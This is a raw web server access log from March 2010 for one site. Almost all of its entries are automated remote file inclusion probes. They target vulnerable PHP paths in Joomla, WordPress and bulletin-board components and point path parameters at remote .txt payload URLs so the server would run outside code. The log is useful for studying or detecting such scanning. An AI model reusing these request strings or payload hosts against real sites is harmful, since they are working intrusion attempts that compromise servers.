219.240.39.222 - - [07/Mar/2010:08:58:29 -0800] "GET /appserv/main.php?appserv_root=http://www.lazaruswilliamson.com/new/data/bid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:29 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:29 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:29 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [07/Mar/2010:08:58:29 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.lazaruswilliamson.com/new/data/bid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [07/Mar/2010:08:58:29 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://www.lazaruswilliamson.com/new/data/bid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:34 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:34 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:34 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [07/Mar/2010:08:58:35 -0800] "GET /logs/access_100201.log/config.php?path_to_root=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:51 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:51 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:58:51 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:12 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:17 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:26 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [07/Mar/2010:08:59:28 -0800] "GET /logs/access_100206.log//appserv/main.php?appserv_root=http://www.lazaruswilliamson.com/new/data/bid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:35 -0800] "GET /logs/access_100224.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:37 -0800] "GET /logs/access_100224.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.142.208.158 - - [07/Mar/2010:08:59:38 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.142.208.158 - - [07/Mar/2010:08:59:38 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.142.208.158 - - [07/Mar/2010:08:59:38 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:42 -0800] "GET /logs/access_100224.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:42 -0800] "GET /logs/access_100225.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:08:59:42 -0800] "GET /logs/access_100225.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:00:04 -0800] "GET /logs/access_100225.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:00:42 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:00:50 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:00:50 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:00:50 -0800] "GET /logs/access_100128.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:09:01:14 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:09:01:16 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:09:01:16 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:09:01:30 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:09:01:30 -0800] "GET /logs/access_100217.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:09:01:31 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:09:02:32 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:09:02:32 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:02:42 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:02:42 -0800] "GET /logs/access_100128.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:02:42 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:09:03:10 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.156 - - [07/Mar/2010:09:03:10 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
219.150.205.155 - - [07/Mar/2010:09:03:10 -0800] "GET /logs/access_100212.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:03:48 -0800] "GET /logs/access_100208.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:04:04 -0800] "GET /logs/access_100208.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:09:05:01 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:09:05:01 -0800] "GET /logs/access_100224.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:09:05:02 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [07/Mar/2010:09:05:04 -0800] "GET /logs/access_100101.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
67.195.112.232 - - [07/Mar/2010:09:05:52 -0800] "GET /diger HTTP/1.0" 301 74 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [07/Mar/2010:09:05:52 -0800] "GET /diger/ HTTP/1.0" 200 3529 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [07/Mar/2010:09:05:53 -0800] "GET /style/5.style.css HTTP/1.0" 200 2407 "http://www.puaga.com/diger/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:06:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:06:04 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:06:04 -0800] "GET /logs/access_100128.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.234.201.2 - - [07/Mar/2010:09:06:36 -0800] "GET /logs/access_100208.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:06:39 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:06:39 -0800] "GET /logs/access_100130.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:06:40 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:06:43 -0800] "GET /logs/access_100219.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:06:43 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:06:43 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:43 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:44 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:44 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:44 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:44 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:45 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:06:45 -0800] "GET /logs/access_100210.log///bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:09:06:55 -0800] "GET /logs/access_100202.log///bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:06:56 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:07:00 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:09:07:00 -0800] "GET /logs/access_100224.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:09:07:00 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:09:07:00 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:07:39 -0800] "GET /logs/access_100224.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:08:10 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:08:10 -0800] "GET /logs/access_100130.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [07/Mar/2010:09:08:10 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:09:34 -0800] "GET /logs/access_100219.log%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:09:10:05 -0800] "GET /includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:09:10:05 -0800] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:10:05 -0800] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:10:06 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:10:08 -0800] "GET /logs/access_100130.log%20%20//chat/inc/cmses/aedating4CMS.php?dir[inc]=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:12:19 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:12:19 -0800] "GET /logs/access_100219.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:12:19 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
209.20.83.132 - - [07/Mar/2010:09:12:56 -0800] "GET /includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
209.20.83.132 - - [07/Mar/2010:09:12:56 -0800] "GET /logs/includes/dbal.php?eqdkp_root_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:13:18 -0800] "GET /logs/access_100224.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:13:55 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:13:55 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.98.1.242 - - [07/Mar/2010:09:14:02 -0800] "GET /logs/access_100219.log%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://gesprachen.wewillhostit.com/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:14:51 -0800] "GET /logs/access_100203.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:16:02 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:16:02 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:16:02 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:16:13 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:16:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:16:14 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:09:18:00 -0800] "GET /logs/access_100131.log%20%20/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:09:18:00 -0800] "GET /playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [07/Mar/2010:09:18:00 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://boats.uksi.ru/sh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:18:29 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
